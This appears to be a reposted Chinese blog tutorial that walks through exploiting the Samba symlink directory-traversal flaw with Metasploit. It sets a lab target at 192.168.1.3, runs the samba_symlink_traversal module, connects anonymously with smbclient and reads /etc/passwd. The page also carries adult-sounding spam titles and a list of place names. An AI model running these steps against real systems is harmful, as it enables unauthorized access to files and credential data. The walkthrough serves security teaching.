亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Metasploit溢出samba提權漏洞

發布時間:2020-06-23 12:18:24 來源:網絡 閱讀:1379 作者:白帽生活 欄目:網絡安全


    Samba是一套實現SMB(server messages block)協議,跨平臺進行文件共享和打印共享服務的程序,samba的sambd默認配置在可寫文件共享時,存在目錄遍歷漏洞,遠程用戶可以通過smbclient端使用一個對稱命,創建一個包含..的目錄遍歷符的軟連接 ,可以進行目錄遍歷以及訪問任意文件。

 

一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。

Metasploit溢出samba提權漏洞


1.3在終端中輸入命令“msfconsole”,啟動MSF終端。

1.4在終端中輸入命令“search samba”,搜索samba的相關工具和***載荷。

1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

Metasploit溢出samba提權漏洞


1.6在終端中輸入命令“info”,查看需要設置的相關項,“yes”表示必須填寫的參數。

Metasploit溢出samba提權漏洞


1.7在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。

1.8在終端中輸入“set SMBSHARE tmp”, 設置SAM可寫文件。

1.9在終端中輸入“exploit”, 開始***。

1.10新打開一個終端,輸入“smbclient //192.168.1.3/tmp”,直接回車,不用輸入密碼。

Metasploit溢出samba提權漏洞


1.11在終端中輸入“cd rootfs”, 進入rootfs目錄,在終端下輸入命令“ls”,列出目錄。


1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。

Metasploit溢出samba提權漏洞

Metasploit溢出samba提權漏洞


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

梧州市| 江西省| 哈尔滨市| 林芝县| 连州市| 洪江市| 漳平市| 花莲市| 东明县| 临夏市| 磐石市| 遵义市| 麦盖提县| 麻江县| 温泉县| 老河口市| 西宁市| 循化| 绥滨县| 长沙县| 邵阳市| 老河口市| 稻城县| 定结县| 道孚县| 重庆市| 五台县| 天峻县| 丘北县| 永城市| 友谊县| 长兴县| 霍城县| 博白县| 昌乐县| 泗洪县| 简阳市| 禹州市| 通海县| 兖州市| 伊宁市|